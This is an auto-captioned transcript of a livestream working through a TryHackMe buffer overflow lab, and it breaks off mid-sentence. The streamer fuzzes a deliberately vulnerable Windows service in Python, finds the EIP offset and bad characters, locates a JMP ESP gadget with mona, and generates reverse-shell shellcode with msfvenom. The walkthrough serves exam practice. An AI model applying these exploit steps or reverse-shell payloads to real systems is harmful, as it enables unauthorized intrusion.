VOD - TryHackMe! Buffer Overflow Prep

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
thanks so much for tuning back in um we are going to be now actually really legitimately taking on the oscp buffer overflow prep room in try hack me um i did we just got x free rdp installed i i really hope we did we did and it's finally working okay so we need to go ahead and set that machine ip address uh we have grabbed that from the room and we can go and connect with that just right now what did you guys think about uh hanging out on that youtube video any any weird thoughts any any opinions as we are now seeing what the heck is that what uh dude i love it when you make your terminal so big that's a weird thing to say but i appreciate it if if youtube you came into contact with twitch you how big would the buffer overflow be that's a genius question slick pop stream was remnant working romano was working okay yeah it was doing weird stuff um with a with the scale but all right with rdp set now let's see what we're up against we're on the desktop we have the vulnerable apps folder and we have a couple binaries here i've also written a handy guide to exploiting these buffer overflows with the help of mona we are using immunity debugger and we have the machine deployed okay so right click the immunity debugger and choose run as administrator when immunity loads click the file open icon or choose file open navigate to the vulnerable apps folder and select the oscp folder we'll use the oscp.exe binary and click open the binder will open in a paused state so that way you can click the red play button or choose debug run in a terminal window the oscp binary should be running and tells you that it's listing on port elite or 13337 on your attacker kali box connect to the port on that target using netcat with this syntax right there that's how we can connect to it nice and easy um and let's do it did did x-ray rdp just straight up die i think it did connecting to the service let's make that a thing can you share terminal details like bash rc or any other configuration i probably could uh sodic is asking hey john sorry is this a free room uh i think so this is a free room according to the internet yes so we can start to play we should really uh do i want to install updates uh yeah i don't care whatever can i use ramana now does the will the scaling actually work if i make a profile uh admin password and client resolution or a custom we can use a custom display size that way we can be able to see it nice and easily so uh try hack me buff prep save and connect fingers crossed that will behave i see that shady boy saying always trust the internet uh literally literally unicorns is asking do you know much about blackberry i'm about to start supporting their silence who uses ai to detect threats before they've been formally identified reported currently supporting the uem mdm solution super stoked to get in the threat detection stuff truthfully i don't know a lot about blackberry what is going on with the whole rdp thing it's like on and off is this whole thing going to be this like shaky and unstable oh okay okay okay okay here she is let's see how long this actually stays online if it does yes it is a free so let's open immunity bugger i think we can right click it and run as administrator as it suggested we'll go ahead and open a program we'll go ahead and navigate to the desktop this is super tiny and i'm sorry you might not be able to easily see it but if we went into vulnerable apps ocp ocp.exe oh god there's no way you're going to be able to see this maybe this is a horrible thing to try and stream i think we can go to the options and set the fonts to uh can i add a custom oh i can hit change right yeah and clearly that needs to be size 14. i think it's obvious it's it's okay i got my i got my magnifying glass out good what's a good debugger for using in linux uh gdb gdb with uh jeff gf and then we can work with mona do we already have mona set up so i'm typing exclamation point mona in the command window down below looks like it is going to return the help information so it is working just fine you can set the working folder to any place that you'd like i suppose we can use that syntax to config set working folder c mono and percent p i will selfishly just grab that and uh rdp rdp are you still with me god [ __ ] maybe we're not gonna be able to do this room maybe this is just maybe this is gonna be a really shitty stream and we're just gonna accomplish nothing maybe we're just not feeling it today i'm sorry i appreciate you guys coming to hang out though like we got a hundred people just coming to party in newfound so ramen is not even like letting me kill it i'm hitting the let me go i just want to go home all right remnant is dead remnants reminisce gonzo x3 rdp made this ginormous display though if if nothing comes from this in the next half hour uh i will just bail i i will be completely honest i i don't i don't really want to have to tinker with this and i'd rather give you guys something worthwhile to showcase maybe brain pain or something a little bit more fun would be reliable or should we just like terminate and recreate this machine let's let's kill it and get a new one um or we could just fail it like a try hack me cough i don't know what else do we got going on just do a volts over one on tron yeah that would be a good idea we have um i do have a video on that over on youtube but it would be good to try and get through this like path here you know what i mean we get 30 seconds until that ip address comes up and we'll see how we do but the other things that we should be looking at if we were to try and keep cruising through this i guess is called brainstorm reverse engineer a chat program and write a script to exploit a windows machine um there are not a lot of prompts here or details so maybe we could work through that do they have cloth rooms you could practice on [Music] um yeah i think so yeah but let's let's try this machine yet again and see if it behaves just a little bit better let's edit this try hack me profile that we had saved in reminder and then try and save and connect and cross our fingers that it behaves honking waffle says hey they signed up for sneak thank you so much i super appreciate that um i i think it's honestly gonna be a really good game it's gonna be super beginner friendly it's gonna be very very um welcoming to newcomers if you feel like hey yeah not exactly a thousand percent positive what i'm doing with ctfs just yet or if you just would like to cut through some good wins you can do that too what the jank please okay we're just we're just not we're just not gonna do that one let's see what this thing has how many ports are open well maybe this will actually work with us not too impressed with how much info they wanted to uh yeah i i feel that i and i totally understand and i totally agree um marketing makes the world go around though um they do some sketch stuff though some some marketing some um like tracking stuff like when you when you have a website set up as a marketing department for a business or a company an organization um you might see some crazy stuff on how they do their their magic like they'll have heat map trapping tracking for the locations that you look around or like move your mouse on a website so that you can see how well your ui ux is actually working i guess we're we're we're in september 8th now yeah yeah exactly gopro slows like yeah keystroke and mouse tracking it's it's it's wacky some marketing just is borderline creepy i will admit um and i don't mean to be discussing this off the tails of a company that i try and support uh but you know let's run map let's run unmapped tac see tech taco and nmap initial with the ip address and before we hit enter let's remember to actually include attack v flag to run verbose mode uh it thinks that it has two ports open it also thinks that the service is down um maybe you know what i think guys i just realized the problem after all this time i was the fool i think i think i have a ton zero interface and i also have a time i also have a ton one interface and i think that might be doing wacky weird stuff so let's kill that vpn and now i no longer have an ipes town one but i have the og ton zero i want to die i want to die more than usual can i can i have a a proper remnant connection now do you think we could really end up doing this buffer overflow all along let's go let's go boys let's go team we really did take the reverse shell on the universe just a little too far didn't we fingers crossed that this works now i'm not happy about that i feel like we've wasted so much time all right let's get reset up is this video going on youtube at this point i don't freaking know let's run this thing as administrator get ourselves situated um let's change the appearance to go back to a large font so you guys with your with your your grandma glasses i really just mean me i'm talking about me uh i really just am talking about my grandma glasses and my inability to see things so if i hit okay let's open up our desktop and we'll get to the vulnerable apps where we have oscp and osp.exe perfect why did you not keep the uh font size that i was telling you did i hit undo on accident or something or cancel but either way um if you hit the play button which also has the keyboard hotkey f5 uh never mind i was wrong uh if you if you ever uh by the way if you're an immunity bugger and you accidentally completely destroy your view and you're like where did all my windows go what is happening um what you need to do is find the cpu window so if you actually go into window uh you can select eight cpu and that should bring it to the foreground and then double click on that so or maximize that you you are most likely just about always going to be working the cpu pane in immunity debugger so if if that's what you're working with that said the hotkey for running the program is f9 i was wrong so you can see down below the terminated uh yellow and red display turned to running so now we know the program is running and we can see this terminal window would appear uh let me see if i can hemp that up lucida consoles yeah bring it to an abnorm uh obnoxious size 24 display because whatever 28 i don't care look look look look it's running great and now we could access it on that port so let's go grab this ip address modify our readme file because i'm pretty sure i changed it yep yep and we could try to connect to it with netcat and we could interact with a service welcome to the oscp vulnerable server enter help for help so we can enter help and then we have a couple options of things that we want to do or commands that we want to run uh it's not going to be as explicit you know when it's actually crunch time to do a legitimate but for overflow but these are the commands that we could run for this service specifically and this looks very very similar to vuln server as you might find on github which i have a youtube video for that if you're interested with that said let's keep moving on and see what we could do with overflow one if you wanted to configure mona which is that exploit developer assistance tool with an immunity debugger then you could use bang mona exclamation point mona and set a working folder or directory that you'll go ahead and save things in and i guess they're just going to hand this code to us which is nice but not extremely necessary we should probably try and write that and create it ourselves but we can go ahead and fuzz stuff we can go ahead and do things so let's write the script ourselves uh we'll put brainstorm away and we'll start to write um what i will call uh zero zero zero um crash dot pi so whenever i'm doing this sort of thing i like to stage out my progress in different code like files so that way i can go back to a part of the process that i might not have been doing beforehand so if i were to try and crash the program cool now i have a proof of concept then i want to see where i could find the eip or the instruction pointer or the rip um and really see where i okay i what the offset is where i clobber things etc um and then finding bad bites and then all these other procedures we'll go ahead and import the socket library and then i think we can use a with socket.socket as s we can do a socket.connect and we'll have to specify the host and port so our host is going to be the ip address we were working with just previously that has to be represented as a string so we'll wrap that in double quotes and then the port number that we want to connect to which is one three three seven being leaked that has to be passed into connect as a tuple which means you'll have to supply other sets of parentheses here um so we could just offer host and port and then we don't need to run s dot close because we're using this context manager or the with statement uh if i try to print s dot receive an s dot receive using the socket library in python requires some value uh i think it does in python 3 actually i gotta be honest i'm not sure let's try and run this receive does take at least one argument so we have to supply how many bytes we want to receive the normal uh like traditional practical value that you'd pass in here is 4096. um just i don't know it's the boilerplate thing that it just tends to be used uh and it will return that value in bytes or what it would have received up to a new line character so we could uh get that i guess banner and store it as a variable um we could decode it because it is going to be returned as bytes and maybe we want to see it as a string and then we could strip out that new line in case we wanted to see that we could try that again and see i think it already said hey enter help for help we would have to then enter a command so what we could specify as our prefix or like the command that we want to run and i'll set this actually just above uh the the socket connection because we don't exactly need to do all this receiving i just wanted to showcase that for you but the command that we would run we'll go ahead and define and we'll make sure that's a byte string as well because all the communication that we're going to end up doing with this socket is going to be bytes in python 3. so uh overflow one and i think that syntax okay no that is that is fully spelt out as overflow one and then we'll try and send it a ton of stuff now what i like to do to do this is actually define a payload and a payload is going to end up being a byte string but i'll join together a big long list and i'll try to do some list comprehension with this or excuse me not list comprehension but join a big long string together with the pieces or the chunks of data that i want to include in my payload and this is super duper helpful for when you get into stuff like a rop a return oriented programming exploit or doing things like um actually do like structured exception handler or other shell code that you might use or other things that become a little bit more complex than just a flat buffer overflow uh stack baseball for overload is everyone okay is everyone good the chat is freaking dead right now did i put you all to sleep i don't even know uh so we'll add the command and we have a a space at the very very end of the command and then we'll add in what we want to actually send following the command or the buffer right what we're using for experimentation's sake let's just try to send it like a hundred a's and one of the beautiful things about python is that uh i'm gonna turn some black off so that way it's not gonna format this for me uh actually i think i could have left subblock on if i just add the comma there yeah yeah yeah perfect um for experimentation's sake we'll send the letter a a hundred times and python is really really good about this because you could literally just multiply a string and it's like you fan it out you just 100 days super duper quick now it's fine to define this payload and create it but then we need to still send it and see what the service might do so let's try to do an s dot send and we'll of course send in the data that we want to send has to be represented in bytes that's why our b prefix is specified there for the double quotes joining together all these chunks command is of the same type byte string byte string a 100 times and then we send it and we'll see how this thing responds i'll move this over to the side and we'll try to uh run it over here i'll hit ctrl b and i have an inconsistent use of spaces and tabs because i am using uh python 3. uh if you're using sublime text you can select everything and then ctrl shift p and then type in spaces convert two spaces or tabs convert to tabs and then you can very very easily get rid of that problem in python 3. save that run it again i'm hitting ctrl b and finished and i don't know if you caught it but we saw one thread exit over here uh it looks like that didn't cause it to crash because it is still running so let's try and amp up how much data we're sending it let's turn that 100 to 500 and hit control b again oh see the new thread come through still hasn't exited the program let's turn that to a thousand and kind of do some binary increasing back and forth run it connection closed still not crashed let's turn this up to like five thousand let's get super wacky control b run it ooh i can see immunity has just spat up and died uh great fantastic we can see that we have crashed the program and we can repeatedly do this with the script which is why i wanted to encapsulate this process and save it as zero zero zero crash dot pi yeah nice with that done we can see in immunity debugger how the program looks in this dead crashed state we can see the registers eax ecx cdx et cetera uh registers being kind of low level boxes to hold data or hold information like essentially variables but at the low level assembly language level and some of them are unique and some of them are special and some of them are important um especially eip or the instruction pointer that's what the ip stands for that's telling the program where to go next uh and because we have clobbered eip we originally were living in a buffer and we have overflowed the buffer with so much data that we've now like broken the lid off the cup you know and now we're pouring out more data and can overwrite eip or the instruction pointer with that being 41414141 which is the hex representation of all our capital a's we know that there's potential to abuse this program and make it do things that it wasn't supposed to do so let's carry on in our reading uh we have written a significantly i guess better script than this or at least cleaner maybe uh it looks like it it tried to repeatedly fuzz data over and over again i think yeah yeah just adding more a's over time looks like it worked for them but now we know that we have a crash replication and we need to be able to control eip the hard part that we're facing right now is that we've just sent 5 000 a's and somewhere in that c of a characters is one sweet spot where eip the instruction pointer lines up you know what i mean let me let me help you visualize that if that's totally cool let's say we just had a crap ton of a's turn word wrap on oh it's already on so i could just black blah now somewhere in this mix is where eip or the sweet spot for where the program would crash and where we have control over that instruction pointer all the data that comes before it is going to be junk and data that we might be able to work with to do other unique things or all the data that might come after it are other buffers that we might be able to use if they aren't totally i see liberia that's like my eyes yes i'm sorry uh coder snack says hey someone told me to come check out your stream learn about coding hacking tools you seem very expert oh thanks so much that's super sweet i'm by no means an expert um i just like to tinker and poke around and play anyway octo money has agreed we have many many a's the next thing that we're worried about is finding which of those a's is the threshold sweet spot where we have control over eip the way you could find that out is replacing the huge length of a's with a cyclic pattern or a pattern that you know isn't just aaa static over and over and over again but it's like a b c d a b c e a b c f and some portion is changing every couple of four bytes we're using four bytes because it is 32 bits in this case we're working with x86 um and that's just going to be the size of an address or some memory location the question is how can we generate 5 000 entries of that strange cyclic pattern without writing it by hand so there are a lot of tools that could do this right you could use pwn tools if you're into that scene uh if you know you're you're smart with pontos or you could use metasploit and uh they're msf tools looks like they actually have that suggested in the try hack me value you can use user share metasploit framework tools exploit pattern create and then specify length of 600 right so if i were to actually just locate uh pattern create i see mine right there mine is an opt and i use locate if you don't have locate installed you can sudo apt install mlocate that is the utility you could use and then whenever you want to search for something if you haven't changed your updated your cache uh then you can use db uh to make sure you are now looking for things with locate super easily i see octa money saying yeah why not just use cyclic you totally could um cyclic is part of pwn tools if i which cyclic does it tell me yeah yeah it's a python script um and you could totally do that uh pwntools is absolutely fantastic and something that we should probably focus on on stream at some point but for the beginner showcase right we're going to end up doing this with um our good friend pattern create from the metasploit tools framework so let's run pattern create and it needs to know a length right the tac-l argument that you saw being passed and try hack me we originally were working with 5000 so let's just use that and instantly have a crap ton of data pumped out to the screen but you can see that slight change in a cyclic pattern right so we could grab this entire payload and use that in our script rather than the a's i'll call this finding eip and actually remove the zero zero one crashed because i saved on accident uh but now rather than the a's let's just use a byte string and plop in all of that disgusting nonsense that is what we're going to end up using there yeah oh i see a rocket sheep asking hey how do you actually install pwntools and i see opera borios i forgive me if i butcher your name responding you can just use and saw it with pip nice and easy now that this is done we could literally just use this against the target uh if you find yourself with your immunity bugger still paused or crashed because you just broke it with your previous script you'll want to restart the program you can use that if you attached or excuse me if you open the program through immunity bug if you attached the process you might not be able to uh uh le piece is making fun of me five minutes ago i said we had cleaner code uh if you were to attach to a processing immunity bugger i don't think you can very easily restart it i might be wrong there but open i always tend to like you can press the playback button to restart the program or that hotkey is ctrl f2 perfect once you restart the program you'll have to hit f9 again to run it and you can see there we go now let's go ahead and hit ctrl b to run our script you can see over we have crashed the program and our registers look very very different and we've maybe taken control of stuff yeah our eip value is no longer those four one four one four one four one a's that we represented but somewhere in the mix of this big humongous awful cyclic pattern now we need to know where in that cyclic pattern it was so to do that you could be showcasing the pattern offset tool which will be in the same directory uh cyclic again if you're using pwntools and i see some chatter m alpha's talking about it um yep you can do that super very easily in just one command but you'll separate it between pattern create and pattern offset if you're using this metasploit tool uh i see bravo charlie romero or romeo sorry already telling us we can use tac-q and just slap in whoa whoa whoa whoa i don't know why it didn't paste tat-q to query i guess you could use to think about and then you will go ahead and see where in that big long string you would have had that value we can see the offset or that sweet spot or threshold for where we have control over eip in the instruction pointer that's super duper worthwhile because now we know and we can save that uh let's actually call this like zero zero two eip overwrite dot pi and let's keep track of what we had to begin with we had an original length of five thousand because we supplied five thousand a's to start with and then we use the cyclic pattern to find a new offset of 1978. so if we were to take all of our a's leading up to the offset we could supply what we'll consider a new eip and that will just be a byte string of b's for the moment bbb to just differentiate between our a's now i'll add in that new eip as part of our payload and the chunk and the structure that we want to send it to but then personally i think it's a really good idea to keep the same length of data that you originally sent when you first found the crash it just keeps it restrained to what you knew the original crash to be because maybe sending a shorter length will lead you down a different code path or sending a larger thing we'll lead you down a different code path i i just think it's reliable to maintain the same length you originally sent so the way that you could do that is by adding another buffer but multiplying it out to the final length which would have been 5000 and then subtracting out the previous chunks that you've just added as part of the buffer which means we'll remove out the length of the new ip so we'll have 5000 minus 4 our bbbs and then minus the length of or really our offset as to how many a's we would have in the original value we don't need to use length there because that's already a number just like that um not a comma so black likes it and now we have that payload nice and good right what do you think this will do let's go back to immunity hit ctrl f2 to restart the program hit f9 to run the program and let's run this payload there we go you can see in immunity debugger we have a really interesting thing happen eax the registers up here saw our original command overflow aaaaaaaaa and then our eip or the instruction pointer is 42424242 or our bs that we supplied and then the rest of the stack is clobbered with our cccc buffer you can see that here in esp or the stack pointer i see little unicorns asking hey so after this value we start writing with the eip so we can point to whatever we need yes exactly uh eip having control over this instruction pointer means we can bebop around the program and make it go or do really whatever we want cool whoa what are they doing with mona in here so they use mona to find oh msfp msp to find the menace blade pattern so mona might be able to keep it nice and easy for you davey rogers hello thanks so much for coming hang out it's good to see you my friend mona could help there uh super duper good but you could also just do the same thing with pattern offset the next thing that we need to do is find bad characters because we are going to end up needing to eventually have shell code in this in this classic stack baseball for overflow with that said shell code could have characters or bytes that won't easily and readily be interpreted by a program in case it has some specific things that it's sensitive to in memory uh because we're oftentimes working in a low-level programming language like c or c plus there will be c style strings and you're taking an input or data that will be terminated by a null byte or a backslash x 0 0. though that's why you often hear null bytes are a bad character because it will mean oh stop reading the string it means to stop taking in that input and that data there is potential for other bad characters to be in the mix uh i see bravo charlie romeo also saying hey pip install bad characters what is is that a thing am i just unaware uh pit bad cares a hex bad character generator to instruct encoders like shakata ganai to transform those to other characters low what so you can just get the bad characters generated out displayed out in python oh that's kind of that's that's kind of cheesy not gonna lie uh it'll if it if it just spits it out for you that's i appreciate that and i like that however let me show you some other python magic to just do that naturally um octo many is asking are you allowed to bring your own coded scripts the oscp exam for buffer overflows yes you have any notes or anything that you've already prepared you're totally welcome to use so let me show you a real quick thing uh friends you know how you have the range function in python and you can like count up from zero to a number like 256 yeah 255 specifically maybe the ascii range but it is you know not inclusive so 256 is where you want to be um you know that zero is going to be a bad bite or a null by character so don't use that one or just make it starting from one and if we were to just turn that into a bite array we then have all of the data that would have been in that bad character's language or that library so that is all you need to to get that data so what i like to do is honestly just take a a script let's let's rename a third rendition of this call it like uh find bad characters and let's say all characters can equal that byte array from the range of 1 to 256 and i like to keep track of bad characters in its own list that i might be able to add to or add other things to as i do this iterative process to learn them now i suggest keeping your new eip present with the offset um but then adding in all characters that you're trying to test just before your c buffer so you can see it on the stack with an immunity bugger with doing that you know you'll have to remove out the length of all characters so your final payload length is still 5000 or the original one i think that is the best technique you could do just simply add it in to the original chunk that you had and make sure you subtract out that that distance yeah with that said we could figure out in a manual iterative process what the bad characters might be and remove them from our all characters chunk and buffer so let's get back to it hop over to immunity hit ctrl f2 to restart the program f9 to run it and let's execute our script with control b and sublime text okay so uh we can see we are back where we were eip is filled with our bees so we have a potential eip uh place to put it in and then down on the bottom right we can see the dump here as to what our our stack might look like now what i like to do is look for patterns in the vertical lines here um we can see that okay we start with one two three four and this is kind of looking like it's backwards because it's little endian uh but notice that we went from one two three four to five six and then suddenly zero a zero d uh whack right looks like we totally skipped zero seven zero eight and some of those those suddenly became a new line character zero a and zero d and zero nine and then went to zero a et cetera so i i think we lost zero seven as a bad byte yeah just looking through that manually with that in mind let's try and add that to our list we'll add backslash x now having this in our list is all good and fine and dandy but we have to make sure we remove that from the all characters pool that we end up sending as part of our payload so we can iteratively look for the next bad character let's do that let's try and remove those by doing for bad car in bad characters let's say all characters can equal the original characters but replace that bad character that we found with nothing as in we basically just remove it so this allows us in our python code to just start to build out a list of these bad characters and then we could slowly one by one add them to the mix as we discover them yep okay with that done we don't need to continue going through the rest of these because we immediately already found one bad character let's see if we can remediate that and move on without it ctrl f2 f9 to run it and go oh a bite's like object is required not a string oh because our bad characters need to be represented with a b byte string everything's got to be bytes here we go run it now we can see we're back in action so we go from one two three four five six and we're skipping seven but we have eight and nine a b c d e f and then a weird null byte at zero zero oh no no no sorry sorry uh zero e0f and then one zero looks good so far uh and then two or hex 12 x 13 x 14 x 15. all good all good all good one a one b one c one d this is where i start to look for that pattern of finding a one five a e looks like a two six a e so we might have missed some other value there maybe one a one b one z one d one f actually these look all good right oh no we actually miss a 2e it looks like we go from 2d to 0a again so that dies we can add 2d as another bad character did anyone follow that logic did i was i talking a little bit too fast in that or was not was that not visible just for me mumbling to myself i i feel like i'm teaching right now so can you right-click eip and follow in dump um seemingly not right now could you copy that dump and search for missing characters using a script uh quote you can automate that right yes what is filtering these bad characters on the target so that is totally dependent on the binary itself it's totally dependent on the executable or what you're targeting like what you're up against uh and sometimes it's kind of hard to track that down and find it truthfully as painstakingly slow as the manual processes sometimes it's still absolutely necessary to just do kind of by hand 2d is that still gone 2d 2e is even gone just as well let's add let's add 2d and 2e in here can anyone fill me in like i would like to learn just as well if there is a better way to automate this okay that looks better because we go from 2f to c to 2f and then 3 0 through 1 3 3 et cetera et cetera et etcetera i'm gonna look for that zero a zero d pattern now because it looks like everything that gets whack comes from that structure and i don't currently see any new ones oh except for zero d0a following a 9a it looks like an a1 or an a0 a0 and a1 so let's add b hex a0 ctrl f2 f9 this is the iterative process that's a little bit slow you can use mona there's a for loop that will go over each bite of what you sent and replace it manually i wasn't following what was happening there forgive me going back to our a's i no longer see that issue with a zero i don't see any other zero zero a a or zero a zero d tricks so i think we are all good for bad characters right you can see that go from all the way to uh our our c buffer yeah vid at i don't think this really counts as binary exploitation i'm using immunity debugger which is vomit inducing and it's just a classic stacked base buffer overflow if it once i start to do some other like leet [ __ ] with rob or anything other cool and in linux then i'll consider myself doing real pwn but this is this is the cookie cutter baby stuff i think we're all good with these bad bytes so we have zero seven two d two e and a zero was there anything else that you think i missed am i am i overlooking anything let's get back to try hack me and see what it thinks looks like it was going to end up using a mona to compare some things i don't know how well mona will do with that i really just tend to trust doing the manual process and then we need to find a jump point or so what we're going to end up doing to try and find where we could make the instruction pointer go because we now know all of these bad characters we can continue on in the process of uh jump jumping to a different location we don't need to send all characters anymore but now we need to know where we're going to end up going to end up running and executing new code on the stack so if i weren't sending the all characters buffer we can see that we just have cccc or a c buffer on the stack which is something that we are currently including in our sp or our stack pointer esp you can see all of our cs or input that we can control is some location we could go to so are there any ways that we could actually have an instruction in this binary like in this program that we're running that could we could latch onto and use and abuse to have us jump our code execution process into what is in the stack into our buffer of c's uh if we were to literally interpret four three four three four as like an op code or as an assembly instruction i think that's like what increment ecx maybe or edx it's one increment operation which essentially acts as a no op or a no operation instruction if if you don't care about what that registry value is but we would realistically want to use our own no op sled or anything but first we need to figure out how we can get to that address in our code execution flow this is where mona really really comes in handy because you could do things like find roth gadget or look in the binary as to where these instructions might be and what their local addresses are but mona can help you do this so if i do a exclamation point or bang mona we'll look for an r uh esp i think and then it's jump is that the syntax let me go verify yeah yeah mona jump and then tack our esp and then you can add in null bytes that you don't want included there uh with backslash x00 or other things um eight bit only is asking no op or no hup it is um no op sorry i was processing what lyrex said lyrics is saying cc is actually in three as far as i know no backseating no i agree with you i agree that uh cc on its own um is interrupt but i believe what we would end up executing there is not cc but hex four three do i have nasm can i do nasm shell can i locate nasm nasm shell please hello this is another meta sport utility where you can kind of tinker with hex codes so if i were to run nasm shell i have a lot of errors but int 3 is cc for opcodes as you instructed as you suggested but i think ink e c x as a register is oh four one what is inc eax four zero so how about four four d e e b x four three so r hex 4 3 would it refer to an increment ebx instruction uh that was totally tangential and not related to buffer overflows so forgive me uh let's try and use mona to jump find a a jump instruction with the esp register uh if you run this command and mona displays content for you and then suddenly hides itself for some reason it does this and i have no idea why i just like to run mona on its own so that i can get the window to display again and it just gives me all the debug help information just like attack h but i don't really care uh it will still you know just pull up the menu um way way way up looks like we can find um the results from that previous call and zinster's asking hey john you're awesome when do you sleep uh once we're done the results here display some options for these jump esp instructions now you specifically want to look at the mitigations that might be in place in here whether or not aslr is on address space layout randomization or whether it's rebased or the structured exception handlers on or anything like that you also oftentimes want this to be included in a dll or library that is not going to be reloaded every time if you can get it in the binary itself that's perfect however this one ess funk will work just fine as our target because it's not going to be rebased we want to look for a target with as many false options that we can see so no security at least um the least amount of security mitigations and still matches our bad character criteria um they note ones that are ascii as in the bytes here representations are all filled with ascii characters or what they'll kind of be interpreted as oftentimes that's really really good because some of your shell code you're practically always gonna find ascii characters or accept it as good characters not bad characters so with that all done we can select one of these honestly any of them i'll go ahead and copy to clipboard the address because 2 5 0 11 af none of those are bad characters that we know of in our script so uh let's use that jump being a jump esp instruction uh and you could just slap this in but it needs to be represented as little endian in your python script uh right now it it's just kind of floating as heck so we need to add a 0x to represent it as hex but even then it needs to be represented in little endian you can packed data in a specific way to get it to return with that structure in style and you can do that with the built-in library struct and then struct has a function struct.pack and you'll have to specify a specific format specifier as to how you want to pack that data um if you can bear with me we're really just gonna press the i believe button here uh and this should be a comment this is not gonna be code that we use right here right now uh if you press the i believe button and just bear with me wakawaka less than symbol alligator face you know and then capital i that will pack it in little endian and integer i think that that might be right representation and then you'll pass in the argument that you want to convert so that has to be represented in hex there um and that will return it out in little anion format for you i think that's super duper handy and it is a built-in language or built-in library struct is native you could do this with pwn tools right if you were to fompone import everything and all of your a lot of your life would be much easier if you were using bone tools but it the function is called p32 for pawn tools for pack as a 32-bit one let's for the sake of nicety let's define our own function p32 that will do this for any arbitrary data that we want we could pass it in as an argument and then return it with data being passed there now we can cast things into little endian super duper easily okay with that said our jump esp variable needs to have that p32 representation there because we've just defined that and we've wrapped it around that strunk that struck pack call yeah now our new eip doesn't really need to exist we could set it to jump esp and then just keep using that variable if we wanted to or we could kind of be explicit and just start to say our new eip will now be our jump esp instruction yeah nice and easy so let's do an interesting thing let's save this code and work with it in immunity debugger let me uh ctrl f2 to restart the program hit f9 to run it but before i execute this payload before i run the python script what i want to do is i want to set a break point in the debugger what we're using right now in immunity debugger to watch us actually land at that code point as we execute and work through this program so what i'm going to do over on the top left you can see this is actually where we see all of the instructions for the program a lot of assembly a lot of push pop move lea jump etc uh you don't have to look at this all that in depth right now but we know that that's where we're going to see the instructions for what is executing as part of the program's code or its instructions if i were to hit g i think it's ctrl g uh yeah ctrl g i think that's right let me verify yep yes it is let me uh restart so we can go back to it uh ctrl g will let you go to a specific location now i could just paste in this new value where we know we're going to end up having a break point um lapis on the moon hello hello thanks for uh it's weird talking to you on twitch instead of youtube anonymous so far says thanks for stabbing john and i i appreciate you correcting yourself but thank you yes i am also thankful for stabbing me anyway uh you better stay anonymous that's funny you can see when we hit control g and we went to this instruction it brought us to a jump esp instruction exactly what mona was able to find for us uh now i could right click and set a break point over here you could hit the toggle button which is just f2 you'll notice that that line becomes illuminated and like a teal or a light blue and you could toggle a break point on and off by again hitting f2 so at this point we can run the program and we're not going to hit this breakpoint yet but once we execute our payload we know that we're going to eventually clobber the instruction pointer like break eip and then replace it with something at run time that will navigate us to this jump esp instruction yeah so let me hit control b on this there we go and over on the left hand side you can see oh we are paused currently and we've hit our break point six two five zero you can see that that is kind of the illuminated line right now now if i were to try and step uh and that i believe is f7 f7 lets us move just one instruction at a time so i'll hit f7 and you can see that that has jumped the code instructions all the way to these inc ebx or hex four three four three four three four three which is our c buffer which you saw right over here in the stack right over here is the contents of our esp register and now because of this jump esp instruction we're way over here i could keep hidden f7 and i don't know if you notice but we are in fact executing that inc ebx or increment ebx you can see that value in the registry changing going up as i hit f7 and keep incrementing so we're executing code off the stack thanks to this setup but now we are going to need to actually replace this with real code to do something other than just increment ebx right so we can put in shell code at this point all because we have the ability to execute code off the stack and again real new modern actual current implementations there are a lot of security mechanisms in place that don't allow you to do this nx being one of them the non-executable bit uh dep the data execution prevention et cetera uh that it won't allow you to run code like that or execute shellcode just off the stack so we know this is working now but now we need to kind of work with our payload and really start to do some damage at this point you can generate some shell code and you can use msf venom to do that for you we know that our target is going to be running on windows and so you could use a staged i believe i might be getting the wrong word here the underscore which means that the entire payload is bundled up into this uh chunk on its own it doesn't need to reach for another external stub staged and stageless i always get the definition wrong in my head i always say stage when it's all bundled together but we'll set el house to be our callback ip address elport has to be the host we'll go ahead and listen on and then we'll add in our bad bytes and represent it in however way we would like let's do that let's use msf venom to attack p windows shell reverse tcp i'll set my l host to be ton 0 which i believe we know to be my ip address that thing but that exploit we'll know and we'll set the l port to 9001 because it's over 9000 and we'll specify the format in python nice and easy i think pi 3 is even a thing that will do and it'll it'll make it bytes for you just just necessarily lapis on the moon is meaning it should be called lower dash instead of underscore uh vid ath is asking stage is when it isn't bundled together right i think you're right i honestly i always get that messed up in my head anyway with our msf venom command that we run uh attack f for the format to get the shell code but if you also specify tac v you can specify the variable name i really really like to do this because uh it gives you the variable name that you might want to use in your code like shell code fingers crossed i had that syntax right take a second for it to generate nope looks like it needed this specific format name and it should be pi not pi 3. i was wrong how about that cool okay so now you can see we have our shell code right up here up i was bringing stream labs into the stream for a quick second that was an accident uh this works but uh we forgot to specify those bad bytes right we can see the backslash x00 or these null bytes present uh that's not going to work for us in our shell code so what we could do is we could rerun that same command but let's use that tack b to represent the bad bytes thankfully we've kept a list in this bad character script here let me copy all of these and i'll put them in sublime text i am going to get them into a new tab and then just paste it hit shift tab to bring it all to the current line if you like to work in sublime text you can use ctrl a to select everything and then ctrl shift l to use multiple cursors and then we can navigate around each of these lines what i'm going to do is i'm going to bring us to the end and then i'm going to bring us to the front knit backspace and remove some of these things and uh remove all those lines so i can eventually just have this syntax of these bytes all on one line uh yeah quick quick sublime text magic tricks there we go we have all of our bad bites present and uh yep sudek is asking yo can you use the shakatakanai encoder like yes you totally absolutely can um because we've specified these specific bad bites looks like msf venom wanted to encode it regardless and it just chose chicago and eye for us so that's one of the handy things i see mayo cat starting the holy wars between vim and literally any other text editor nice oh and we can copy and paste all that shell code super bright and uh let's get that into our script you need to put out a sublime text udemy course i appreciate that now we have our shell code just slapped into our program and it add the byte syntax for us nice and easy so we know that our jump esp would bring us to our c buffer but we're gonna make some room as to where our c buffer is going to put data and put stuff we should also generate that knob sled or the no operation remember a knob sled is just the ability to do nothing that's literally what it means no operation uh and they actually showcase this and try hack me just as well uh they aren't using bytes which is weird but backslash x90 will do nothing if we take that and multiply it by 16 or 20 or 24 just some again factor of four or multiply uh because a multiplication of four because of how long you'd expect them uh california says is not pretty much sleep um i wouldn't i wouldn't say that because asleep can say hey sleep for five thousand seconds uh knop is gonna say do nothing and continue just like keep cruising we use the knob sled because in case there's some weird oddities think of your jump esp that jump esp instruction that you use to literally bebop the instruction pointer and bring your program to someplace else in the instructions and the code think of it as jumping on a trampoline like you don't know exactly where you're gonna land so you want to give yourself enough of a cushion that you can continue on in code execution and continue on what you were doing without accidentally landing on some middle of the shell code or something weird so having a decent knob sled which is a good thing to do and that's why we include that so we could use from our c buffer where that would have been after the jump esp let's have our knob sled right there and 